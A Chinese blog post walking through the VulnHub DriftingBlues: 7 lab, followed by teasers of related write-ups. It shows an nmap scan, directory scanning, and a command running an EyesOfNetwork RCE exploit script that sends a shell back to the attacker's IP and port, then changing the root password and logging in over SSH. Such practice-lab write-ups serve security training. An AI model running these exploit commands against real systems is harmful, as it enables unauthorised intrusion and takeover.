VulnHub 之 DRIFTINGBLUES: 7

最新推荐文章于 2024-06-18 17:47:33 发布
最新推荐文章于 2024-06-18 17:47:33 发布
阅读量792 收藏
点赞数 1
分类专栏: VulnHub 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42075643/article/details/116142549
版权

Vulnhub是一个很好的靶机平台,想看官网点这里

今天学习DRIFTINGBLUES: 7,点击这里下载哦~

推荐使用virtualBox,我这里是VMware,看自己条件使用

难度:简单

基础练习,大佬可以绕过

这里我先总结一下,整个测试过程中的问题与情况:
(至于为什么要在开始做总结,主要是给各位新手朋友提供一个思路,不要直接照着我的抄)
1、 拿到一个测试站的时候,首先就是探测ip端口,因为有了门才要一步一步进入
2、 找到端口以后根据自己掌握的渗透手法,先自行判断哪里薄弱,根据端口去测试
3、一般web比较好突破(看自己)
4、然后看源码先自己判断,然后扫目录,看注入,找cms,看版本,找exp,等等这里就看自己的积累。
5、 多练习,不怕麻烦,多熟悉,我们一起坚持,与诸君共勉~

接下来导入虚拟机,这里选择NAT模式,成功后,如图:
在这里插入图片描述
这里使用kali作为攻击机,首先查看kali的ip:

在这里插入图片描述

使用nmap来探测靶机ip:

nmap -sS 192.198.81.0/24

在这里插入图片描述
可以看到有80端口,先去浏览器找找线索:
在这里插入图片描述
是一个network登录界面,试试若口令,爆破啥的

很遗憾,啥也没爆出来,试试扫描目录:

这里使用的是dirsearch,GitHub上边就有,搜一下就能找到,挺好用的

在这里插入图片描述
没啥有用的信息,不过找到了EON的版本信息:
在这里插入图片描述
找找exp,在这里

给执行权限:

chmod +x eonrce.py

在这里插入图片描述
利用exp:

/eonrce.py https://192.168.81.147/ -ip 192.168.81.148 -port 8888

成功:
在这里插入图片描述

修改密码

passwd root

在这里插入图片描述
这里我将密码改为root

因为之前ssh端口22开着呢,直接ssh连接:

ssh 192.168.81.147

在这里插入图片描述
查看里边信息:
在这里插入图片描述
拿到flag,成功~

小菜茑
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub靶机 | DriftingBlues:7 write-up
xj28555的博客
05-04 8271
靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag,搭建好环境如图。 首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本 上面运行的一些apache、...
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 905
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
vulnhub靶场之driftingblues-7,9
qq_58091216的博客
04-29 167
我们在/home/目录下发现了clapton文件夹,里面有user.txt,我们进行查看,发现了第一个flag。我们查看源代码,发现版本号是ApPHP MicroBlog v.1.0.1,我们可以进行搜索漏洞。我们访问80端口可以看到是一个登录页面,可能是爆破用户名和密码,其他端口都没有有用的信息。我们可以看到反弹成功,我们切换用户clapton/yaraklitepe。我们还看到了一个note.txt文件,我们进行查看,发现是一个提示。开启的端口有点多,首先我们一个一个进行渗透测试,我们先渗透靶场7。
vulnhub实战——DRIFTINGBLUES: 7
Ar_Gin Work
04-18 681
vulnhub实战——Driftingblues7 前言 无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~ 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 可以直接用VM打开,ip会自动获取并显示出来(挺人性化的) 正文 通过nmap扫描靶机nmap -sV -O 192.168.171.134 发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork 再目录
driftingblues9 - 溢出ASLR(内存地址随机化机制)
最新发布
书山有路勤为径,学海无涯苦作舟
06-18 1446
ASLR是一种针对缓冲区溢出的安全保护技术,通过对堆、栈、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的。之后,我检查了 esp 寄存器,并由于小端字节序而用相反顺序的esp地址(由于此时esp地址存储的是下一跳地址,所以还有一种方法二,这个地址话可以填成jmp esp指令的地址(但是,目标上的 ASLR 已启用,如果没有 root 权限,我们无法禁用它。在windows中使用此技术后,杀死进程后重新开启,地址不换,重启才会改变。
vulnhub靶机 | DriftingBlues:7
在下小黄的博客
06-07 1143
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。 创建时间:2021年6月7日 软件: MindMaster Pro、kali、DriftingBlues:7靶机 DriftingBlues:7靶机解题过程及思路前言:信息搜
Vulnhub:DRIFTINGBLUES: 7
NeverForgetCX的博客
02-28 3217
前言: 在朋友的推荐下,空余时间中下载了vulnhub的随机靶机DRIFTINGBLUES:7,尝试实战 靶机在Vulnhub官网下载镜像,完成后可直接用VM打开虚拟机;努力成为专业白帽子!!! 信息收集: 攻击机kali:192.168.2.87 靶机ip:192.168.2.90 打开靶机竟然直接看见了ip信息 IP:192.168.2.90 直接登入kali使用nmap端口扫描 nmap -sV 192.168...
靶机渗透练习07-driftingblues7
hirak0的博客
04-14 667
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-7,680/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. 一、搭建靶机环境
Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 720
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
vulnhub--driftingblues:2
venu_s的博客
06-03 408
靶机介绍 difficult:easy goal:get flags download:https://download.vulnhub.com/driftingblues/driftingblues2.ova 信息探测 主机发现 端口扫描 目标主机开放了21端口,有一张图片,可以匿名登陆;此外还开放了22端口和80端口 访问ftp,下载图片,图片不知道有啥用,先放着 80端口目录扫描 可以看出目标主机使用了WordPress,访问80端口 查看源码,就是一张图片 访问/blog,发现是一些博客
vulnhub--DriftingBlues:6复现超详细过程
m0_54024658的博客
06-05 388
下载靶机并且导入VMware masscan扫描存活主机,发现目标靶机192.168.152.225,并且开启了80端口 masscan -p80 192.168.152.0/24 --rate=2000 访问靶机的80端口,查看原代码,没有什么发现,想办法找页面的文件目录 ==Nmap -p- -sC -sV 192.168.152.225 --min-rate=2000 -vv == 详细扫描IP,发现了一个文件robots.txt,访问一下。 访问robots.txt文件发现一个目录,和提示目录
vulnhub靶机 | DriftingBlues:6 write-up
xj28555的博客
05-06 774
nmap -sP 192.168.110.1/24 #首先扫描存活网段 扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。 nmap -sV 192.168.110.169 开着一个80端口,进行访问。 发现只有一张图片,那我们只好开始CTF的套路了,扫描目录。 python3 dirsearch.py -u http://192.168.110.169/ #用dirsearch扫描目录 扫到robots.txt文件,进行访问一下。 有...
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-7
Aluxian_的博客
06-24 1414
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 下载好了把安装包解压 然后试用VMware即可。kali里使用发现主机 渗透机:kali IP :192.168.205.
Vulnhub-DriftingBlues:7
从不专注的人的博客
06-08 189
Vulnhub-DriftingBlues:7 目录Vulnhub-DriftingBlues:7信息收集扫描目标网段查看端口及服务查看服务运行的版本访问网站提升权限运行脚本 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 信息收集 扫描目标网段 nmap -sP 172.16.58.0/24 查看端口及服务 nmap -p- 172.16.58.135 查看服务运行的版本 nmap -sV 172.16.58.135 访问
Vulnhub靶机:driftingblues 7
qq_48904485的博客
01-19 408
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:driftingblues7(10.0.2.23)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/
Vulnhub_driftingblues
m0_60936698的博客
03-12 1576
主机信息 kali: 192.168.58.128 driftingblues3: 192.168.58.131 信息收集 老规矩先用nmap扫描 nmap -sP ip/mask \\扫描局域网内存活主机 nmap -sV -A -p- ip \\扫描靶机开放服务 发现开启了俩个端口 22:ssh 80:http ssh登入,且用户名为一句话木马 进入网页瞅瞅(啥也不是) 用dirb盘一下,用字典来扫描Web服务,找找目录 注:(dirb是一个基于...
【靶场系列】driftingblues7
qq_41169485的博客
04-23 338
扫到一个.bash_history文件,下载查看,根据历史命令推测该目录下还存在一个eon文件。访问80端口,自动跳转到443端口,该cms是eyesofnetwork。根据查找到的EyesOfNetwork漏洞,选了一个可以rce的开始利用。使用john爆破zip密码,得到压缩包密码为killah。推测该账号密码是443端口的web页面登录密码,成功登录。搜索该cms的漏洞,可以看到该cms有很多漏洞。解码可知该文件是zip文件,因为有PK头。解码得到压缩包,但是需要密码才能打开。
vulnhubdriftingblues7_vh
鲨鱼辣椒的博客
06-09 597
目录 信息搜集 扫描网段 扫描IP地址 扫描网站目录 查看网站 发现漏洞 GETSHELL 总结 信息搜集 扫描网段 发现网站真实IP 扫描IP地址 发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点) 扫描网站目录 dirsearch -u https://192.168.179.137/ 虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透.
Vulnhub-DriftingBlues-7
weixin_50342860的博客
08-16 412
@TOC 简介 靶机下载:DriftingBlue-7 运行环境: 攻击机:kali 受害机:DriftingBlues-7 目标:夺到里面的flag 下载好靶机,直接打开(这里使用的是VM,模式选择NAT),如图 信息收集 扫描当前网段存活主机 查看端口及运行服务 查看服务版本 目录扫描 dirsearch 安装方法:点这里 扫描出来的目录没啥大发现 发现漏洞及利用漏洞 访问80端口会被跳转到如下页面 尝试了弱口令,暴力破解都没有猜解到密码,所以我们可以先去扫描一下它的目录结构。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值